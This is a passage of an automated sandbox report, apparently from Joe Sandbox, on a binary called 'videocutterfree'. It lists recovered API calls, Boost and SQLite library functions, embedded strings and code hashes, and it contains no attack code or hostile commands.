  • Part of subcall function 0099C03F: std::exception::exception.LIBCMT ref: 0099C06E
  • Part of subcall function 0099C7F5: __EH_prolog.LIBCMT ref: 0099C7FA
  • Part of subcall function 009A28FC: _malloc.LIBCMT ref: 009A2914
  • Part of subcall function 0099C09E: __EH_prolog.LIBCMT ref: 0099C0A3
Strings
• C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 0099BAA0
• class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 0099BA99
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Yara matches
Similarity
• API ID: H_prolog$_mallocstd::exception::exception
• String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
• API String ID: 1953324306-1943798000
• Opcode ID: 5c41d54f36db6d1c7742c210bf5013c278e32d56ea2f92e741726d0b37c54de2
• Instruction ID: 19fe6814485a124f1c5f80eb1c94eb6df103ce183e76ef81d80c76e2addf2d75
• Opcode Fuzzy Hash: 5c41d54f36db6d1c7742c210bf5013c278e32d56ea2f92e741726d0b37c54de2
• Instruction Fuzzy Hash: F321ABB1E042089ADF14EFECE945BEDBBB8EF91710F00405DF815AB281DB705A04CBA0
APIs
• __EH_prolog.LIBCMT ref: 0099BB58
  • Part of subcall function 0099C116: std::exception::exception.LIBCMT ref: 0099C143
  • Part of subcall function 0099C92C: __EH_prolog.LIBCMT ref: 0099C931
  • Part of subcall function 009A28FC: _malloc.LIBCMT ref: 009A2914
  • Part of subcall function 0099C173: __EH_prolog.LIBCMT ref: 0099C178
Strings
• C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 0099BB95
• class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 0099BB8E
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Yara matches
Similarity
• API ID: H_prolog$_mallocstd::exception::exception
• String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
• API String ID: 1953324306-412195191
• Opcode ID: df3aa1839ba5ee9fcade9527ef3a43a2a474106f258decaa74e217ab55490dac
• Instruction ID: 8b43e8f8fc380d2fcfb0416eced1faf70d6cbef83766a85f494f07ec98747ebe
• Opcode Fuzzy Hash: df3aa1839ba5ee9fcade9527ef3a43a2a474106f258decaa74e217ab55490dac
• Instruction Fuzzy Hash: 8521BFB1E042489ADF24EFECE945BEDBBB8EF95310F00401DF815A7291DBB45A44DBA0
APIs
• _malloc.LIBCMT ref: 0099535D
  • Part of subcall function 009A1D5C: __FF_MSGBANNER.LIBCMT ref: 009A1D73
  • Part of subcall function 009A1D5C: __NMSG_WRITE.LIBCMT ref: 009A1D7A
  • Part of subcall function 009A1D5C: RtlAllocateHeap.NTDLL(00B10000,00000000,00000001), ref: 009A1D9F
• SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 0099536F
Strings
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Yara matches
Similarity
• API ID: AllocateFolderHeapPathSpecial_malloc
• String ID: \save.dat
• API String ID: 4128168839-3580179773
• Opcode ID: 62399f78455698b091c10cfa56bc65622fa0a638e688e1fc6dd5b0e4e8833cba
• Instruction ID: 31a0b4b8fa2add44b7b7f150fcbec38f0f9f892c6adcec63e40825492be98320
• Opcode Fuzzy Hash: 62399f78455698b091c10cfa56bc65622fa0a638e688e1fc6dd5b0e4e8833cba
• Instruction Fuzzy Hash: FC117172904601ABDF269F6D8891D5FBF6BDF837A0B1542A9FC4467202D5A21D02C3A0
APIs
• sqlite3_aggregate_context.SQLITE3 ref: 60914096
• sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
Strings
Memory Dump Source
• Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
Similarity
• API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
• String ID:
• API String ID: 3265351223-3916222277
• Opcode ID: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
• Instruction ID: a3c0f903ff645dd1c5a8146eaa2078e963ad6c1b8d1bbf61d5d4caeb1888773d
• Opcode Fuzzy Hash: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
• Instruction Fuzzy Hash: 19119EB0A0C6589BDF059F69C4D539A7BF6AF39308F0044E8D8D08B205E771CD94CB81
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
Similarity
• API ID: sqlite3_stricmp
• String ID: log
• API String ID: 912767213-2403297477
• Opcode ID: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
• Instruction ID: cbf508da25866b0a35bc2ca480d64d7c482f0664b0359b741109bd545b4f9ff5
• Opcode Fuzzy Hash: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
• Instruction Fuzzy Hash: FD11DAB07087048BE725AF66C49535EBBB3ABA1708F10C42CE4854B784C7BAC986DB42
APIs
• __EH_prolog.LIBCMT ref: 0099396A
• std::runtime_error::runtime_error.LIBCPMT ref: 009939C1
  • Part of subcall function 00991410: std::exception::exception.LIBCMT ref: 00991428
  • Part of subcall function 009993CD: __EH_prolog.LIBCMT ref: 009993D2
  • Part of subcall function 009993CD: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 009993E1
  • Part of subcall function 009993CD: __CxxThrowException@8.LIBCMT ref: 00999400
Strings
• Day of month is not valid for year, xrefs: 009939AC
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Yara matches
Similarity
• API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
• String ID: Day of month is not valid for year
• API String ID: 1404951899-1521898139
• Opcode ID: 6059344ea9648c49cad8dbdf6741479c0ded2d2972ea8eeb66b43e17a4130c40
• Instruction ID: 0fa1b5af644ca00bd2f885554c7ffbf312345b2f6c365476643b679c4005bd54
• Opcode Fuzzy Hash: 6059344ea9648c49cad8dbdf6741479c0ded2d2972ea8eeb66b43e17a4130c40
• Instruction Fuzzy Hash: 72017576818209EADF14EF98D506BEEB778FF98720F00851AFC10A3251EB744A55C795
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
Similarity
• API ID: sqlite3_strnicmp
• String ID: SQLITE_
• API String ID: 1961171630-787686576
• Opcode ID: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
• Instruction ID: 6d5ef3c0fd507030b5e8170497320435726bf3f0db30f2d6f2734bcd7f756fb3
• Opcode Fuzzy Hash: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
• Instruction Fuzzy Hash: 2501D6B190C3505FD7419F29CC8075BBFFAEBA5258F10486DE89687212D374DC81D781
APIs
• sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
• sqlite3_value_blob.SQLITE3 ref: 6091A1FA
Strings
• Invalid argument to rtreedepth(), xrefs: 6091A1E3
Memory Dump Source
• Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
Similarity
• API ID: sqlite3_value_blobsqlite3_value_bytes
• String ID: Invalid argument to rtreedepth()
• API String ID: 1063208240-2843521569
• Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                              • Instruction ID: c9489564a96cd83e586e3a08c251b8a8c74d553169181c25a19da25ffef599d7
                                                                              • Opcode Fuzzy Hash: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                              • Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
                                                                              APIs
                                                                              • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
                                                                                • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                              • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
                                                                              • String ID: soft_heap_limit
                                                                              • API String ID: 1251656441-405162809
                                                                              • Opcode ID: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                              • Instruction ID: 8891d4bbc0f5aef5547f00e3070395c34840fc2012d087b050684f6162b0ba7d
                                                                              • Opcode Fuzzy Hash: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                              • Instruction Fuzzy Hash: C2014B71A083188BC710EF98D8417ADB7F2BFA5318F508629E8A49B394D730DC42CF41
                                                                              APIs
                                                                              • std::exception::exception.LIBCMT ref: 0099E8C6
                                                                              • __CxxThrowException@8.LIBCMT ref: 0099E8DB
                                                                                • Part of subcall function 009A28FC: _malloc.LIBCMT ref: 009A2914
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                              • String ID: bad allocation
                                                                              • API String ID: 4063778783-2104205924
                                                                              • Opcode ID: 85fbef5c1b9c3a0e9f8f29c916977645226037507a2169394c16aebc729beda3
                                                                              • Instruction ID: 3ef5d30b1bd2c87a10072db3c37918e34786ee30928abb8e08b8f501ea59407c
                                                                              • Opcode Fuzzy Hash: 85fbef5c1b9c3a0e9f8f29c916977645226037507a2169394c16aebc729beda3
                                                                              • Instruction Fuzzy Hash: EDF082B050430DAB9F14E7ED9C16AEF77EC9B40314B500529B911E26C1EFB0EA0081D5
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00993C1B
                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 00993C30
                                                                                • Part of subcall function 009A1267: std::exception::exception.LIBCMT ref: 009A1271
                                                                                • Part of subcall function 00999406: __EH_prolog.LIBCMT ref: 0099940B
                                                                                • Part of subcall function 00999406: __CxxThrowException@8.LIBCMT ref: 00999434
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                              • String ID: bad cast
                                                                              • API String ID: 1300498068-3145022300
                                                                              • Opcode ID: e684aa0f8ba1b134436e58cf5d4d796cde5dfc257b150126222230d00a5c46b1
                                                                              • Instruction ID: 1131b83219d9dee0089d6d21484a88c851c12e44cd8ef6aab3be32317990acfd
                                                                              • Opcode Fuzzy Hash: e684aa0f8ba1b134436e58cf5d4d796cde5dfc257b150126222230d00a5c46b1
                                                                              • Instruction Fuzzy Hash: F3F0E572900508DBCB09EF5CD941BEAB779EF96321F00416EFD069B291DB729A46CBD0
                                                                              APIs
                                                                              • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
                                                                              • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_log
                                                                              • String ID: NULL
                                                                              • API String ID: 632333372-324932091
                                                                              • Opcode ID: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                              • Instruction ID: 5a36de60e8574ea04015b231464f09686a41744340efbe7a8a869d8181b3dc96
                                                                              • Opcode Fuzzy Hash: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                              • Instruction Fuzzy Hash: BAF0A070238301DBD7102FA6E44230E7AEBABB0798F48C43C95A84F289D7B5C844CB63
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00993886
                                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 009938A5
                                                                                • Part of subcall function 00991410: std::exception::exception.LIBCMT ref: 00991428
                                                                                • Part of subcall function 0099773B: _memmove.LIBCMT ref: 0099775B
                                                                              Strings
                                                                              • Day of month value is out of range 1..31, xrefs: 00993894
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                              • String ID: Day of month value is out of range 1..31
                                                                              • API String ID: 3258419250-1361117730
                                                                              • Opcode ID: a25c9cc2a6921cc188cd3e38afd3d2c45aee50a3c0dbfcb55c93669942463ff1
                                                                              • Instruction ID: 2f14d93dda67759c08a117a54ac947f629cc0937eb7defa0614d7cae2c255349
                                                                              • Opcode Fuzzy Hash: a25c9cc2a6921cc188cd3e38afd3d2c45aee50a3c0dbfcb55c93669942463ff1
                                                                              • Instruction Fuzzy Hash: F4E0D872E082189BDB24BFDCC912BEDBBB8EB98B30F00455AF401732C1DAB1194087A1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 009938D2
                                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 009938F1
                                                                                • Part of subcall function 00991410: std::exception::exception.LIBCMT ref: 00991428
                                                                                • Part of subcall function 0099773B: _memmove.LIBCMT ref: 0099775B
                                                                              Strings
                                                                              • Year is out of valid range: 1400..10000, xrefs: 009938E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                              • String ID: Year is out of valid range: 1400..10000
                                                                              • API String ID: 3258419250-2344417016
                                                                              • Opcode ID: 40ae69d3e2c070444e127a2f144793004d429bd5ca6c21a97ba24153a3d7799e
                                                                              • Instruction ID: c47a571d9147ce038810f7102c10a4d77c44b64e9cdab9846946379ab9dd3231
                                                                              • Opcode Fuzzy Hash: 40ae69d3e2c070444e127a2f144793004d429bd5ca6c21a97ba24153a3d7799e
                                                                              • Instruction Fuzzy Hash: 19E09272A1821897DB24ABDC8912BDDBBB8EB98720F00455AF80173281DAB1194087A1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0099391E
                                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 0099393D
                                                                                • Part of subcall function 00991410: std::exception::exception.LIBCMT ref: 00991428
                                                                                • Part of subcall function 0099773B: _memmove.LIBCMT ref: 0099775B
                                                                              Strings
                                                                              • Month number is out of range 1..12, xrefs: 0099392C
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                              • String ID: Month number is out of range 1..12
                                                                              • API String ID: 3258419250-4198407886
                                                                              • Opcode ID: cb7107f72338c23c04326c45292372ef036f04c1f13b7ae29c66ed058809e496
                                                                              • Instruction ID: eaa2f12b0c90d944dcf5ddd31e18869fb2cb63f90943ec2c07c571988ab83d87
                                                                              • Opcode Fuzzy Hash: cb7107f72338c23c04326c45292372ef036f04c1f13b7ae29c66ed058809e496
                                                                              • Instruction Fuzzy Hash: 47E09272A482189BDB24AFDC8952BDDBBB8EB98720F00455AF80163281DAB1294487E1
                                                                              APIs
                                                                              • TlsAlloc.KERNEL32 ref: 009919CC
                                                                              • GetLastError.KERNEL32 ref: 009919D9
                                                                                • Part of subcall function 00991712: __EH_prolog.LIBCMT ref: 00991717
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocErrorH_prologLast
                                                                              • String ID: tss
                                                                              • API String ID: 249634027-1638339373
                                                                              • Opcode ID: 9b2c0994d482538cb9d0b349fc64e51a6ae961694d138f9b41fc97dd7174ae18
                                                                              • Instruction ID: 58125eb4c4c75d758049a2f086ffd68579dd010b01cf9367c1984e9de33a2942
                                                                              • Opcode Fuzzy Hash: 9b2c0994d482538cb9d0b349fc64e51a6ae961694d138f9b41fc97dd7174ae18
                                                                              • Instruction Fuzzy Hash: 54E08632D186115BC7107B7DAD0909ABB94AA84370F108736FCB9C32E0EB3459449BC2
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00993BD8
                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 00993BED
                                                                                • Part of subcall function 009A1267: std::exception::exception.LIBCMT ref: 009A1271
                                                                                • Part of subcall function 00999406: __EH_prolog.LIBCMT ref: 0099940B
                                                                                • Part of subcall function 00999406: __CxxThrowException@8.LIBCMT ref: 00999434
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                              • String ID: bad cast
                                                                              • API String ID: 1300498068-3145022300
                                                                              • Opcode ID: 4bd3dffe26a6e7b82329eecf12cd4c8c491d465a6914925830655d1fbce5c47f
                                                                              • Instruction ID: 53e7dbbbd2f912f429abed0624027eb9d5f87877a3bea741664577955935b28f
                                                                              • Opcode Fuzzy Hash: 4bd3dffe26a6e7b82329eecf12cd4c8c491d465a6914925830655d1fbce5c47f
                                                                              • Instruction Fuzzy Hash: 70E01A71904108DBCB15EF58D642BB8BB74EB55324F00816DE81657291DB315A56CA91
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32 ref: 0040252D
                                                                              • GetCommandLineW.KERNEL32(?), ref: 0040B280
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CommandFileLineModuleName
                                                                              • String ID: DVCMediaPlugin
                                                                              • API String ID: 2151003578-4056201269
                                                                              • Opcode ID: 71392fe5a3be4fb78060ad3a8378c7b55e262e8708a40cbd385b64c612fed332
                                                                              • Instruction ID: bedbd4e46a4fd4a819c0a43bcafebb5618177e49726b5f5a860a52e84a032d73
                                                                              • Opcode Fuzzy Hash: 71392fe5a3be4fb78060ad3a8378c7b55e262e8708a40cbd385b64c612fed332
                                                                              • Instruction Fuzzy Hash: 46D0C7B1548016BAC215E790AA5C57E23599609755721043FF557B10C1CABC1146663E
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32 ref: 00402740
                                                                              • GetModuleFileNameA.KERNEL32(00000000), ref: 00402747
                                                                              Strings
                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040BC67
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Module$FileHandleName
                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                              • API String ID: 4146042529-2036018995
                                                                              • Opcode ID: e9ce4c86d3cf87659a9eeeb01830d16e409caa451546f89b42d3a595222e8b7e
                                                                              • Instruction ID: d4c683b9484571c3381a6194b72dc698f9904dff4541561a02d8569ef51c7585
                                                                              • Opcode Fuzzy Hash: e9ce4c86d3cf87659a9eeeb01830d16e409caa451546f89b42d3a595222e8b7e
                                                                              • Instruction Fuzzy Hash: DFD0C9B0849205FECA108BA09E8DE6F36ACA704745B204833B703B30E0CABD4501A62E
                                                                              APIs
                                                                              • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00404424,?,?,?,00000100,?,00000000), ref: 00404684
                                                                              • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00404424,?,?,?,00000100,?,00000000), ref: 004046B8
                                                                              • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00404424,?,?,?,00000100,?,00000000), ref: 004046D2
                                                                              • HeapFree.KERNEL32(00000000,?,?,00000000,00404424,?,?,?,00000100,?,00000000), ref: 004046E9
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: AllocHeap$FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 3499195154-0
                                                                              • Opcode ID: 45119aa763da898996da901e331d9372f46da870962aa07eee90f07326892be3
                                                                              • Instruction ID: 81a64163ee6980f8680f2cf0fd42a529d9dee28e1af2c6baa0891a415d104b91
                                                                              • Opcode Fuzzy Hash: 45119aa763da898996da901e331d9372f46da870962aa07eee90f07326892be3
                                                                              • Instruction Fuzzy Hash: 1A116A70200301AFC721CF59EE459267BB6FB8A320711493DF256FA1B0D3769861CF19
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
                                                                              • TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
